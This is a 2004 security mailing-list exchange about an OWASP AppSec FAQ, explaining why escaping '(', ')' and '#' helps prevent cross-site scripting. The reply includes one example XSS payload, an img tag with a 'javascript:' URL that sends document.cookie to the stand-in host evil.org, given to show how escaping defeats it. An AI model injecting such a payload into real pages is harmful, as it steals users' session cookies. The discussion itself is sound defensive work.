RE: AppSec FAQ at OWASP

["Sangita Pakala" <sangita.pakala () paladion net>]

Thank you Ulf for the nice words. To address your question:

> Why is it important to escape "(", ")" and "#"?

We need to escape these characters to take care of CSS that do not rely
on <script> tags. For instance, the "javascript:" construct could be
used to embed scripts without using the <script> tag. In the example
below, let's say that the user's input is reflected as the value for
<img src= >. Now, when the img src= line is encountered, the window.open
javascript function is called and the cookie sent to evil.org 

<img src=
"Javascript:window.open('http://www.evil.org?cookie='+document.cookie)">

Escaping the "(" and ")" above renders the function call mute.

If someone can point me to a good example for when escaping "#" is reqd,
I'd love to hear that. Gunter Ollmann has an excellent article on CSS
and special characters at http://www.technicalinfo.net/papers/CSS.html

Regards,
Sangita.

Sangita Pakala
Paladion Networks
http://www.paladion.net


-----Original Message-----
From: Ulf Härnhammar [mailto:Ulf.Harnhammar.9485 () student uu se] 
Sent: Wednesday, January 28, 2004 9:56 PM
To: Sangita Pakala
Cc: webappsec () securityfocus com
Subject: Re: AppSec FAQ at OWASP

Nice document! Good work!

> XSS can be prevented while coding the application. You should be
validating
> all input and output to and from the application and escape all
special
> characters that may be used in a script. If the code replaces the
special
> characters by the following before displaying the output, XSS can be
> prevented.

> (           &#40;
> )           &#41;
> #           &#35;

Why is it important to escape "(", ")" and "#"?

-- 
Ulf Härnhammar
 student, Uppsala universitet
 redaktör, idiosynkratisk (
http://labben.abm.uu.se/~ulha9485/idiosynkratisk/ )